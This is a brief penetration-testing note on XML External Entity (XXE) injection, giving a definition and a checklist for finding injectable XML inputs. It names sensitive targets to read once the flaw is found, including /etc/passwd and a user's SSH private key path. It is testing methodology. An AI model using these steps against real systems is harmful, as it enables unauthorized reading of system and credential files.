AppSecNotes
XXE - XML External Entity Injection
XML External Entity Injection (XXE) is a vulnerability that allows an attacker to interfere with an application's processing of XML data. Allows attackers to view files in the server filesystem and/or to interact with the backend from the application.
  1. Look for forms that might be posting XML. Check if endpoints posting JSON also work with XML, the server might support both. Upload of images might be vulnerable if SVG is supported as well.
  2. Try it in any XML that is passed on to the server.
  3. Try it in bodies that are not using XML or JSON because they might become part of XML on the server side. E.g. of body: productId=2&storeId=1.
  4. Try converting format of data from json to XML (and Content-Type to text/xml) in some requests because the server might support it.
  5. If nothing works refer to Unrestricted File Upload and follow through.
  6. If able to read "/etc/passwd" try to extrapolate more data, e.g. the ssh keys of an user: "file:///home/user/.ssh/id_rsa" to prove impact.
Payloads at PayloadsAllTheThings.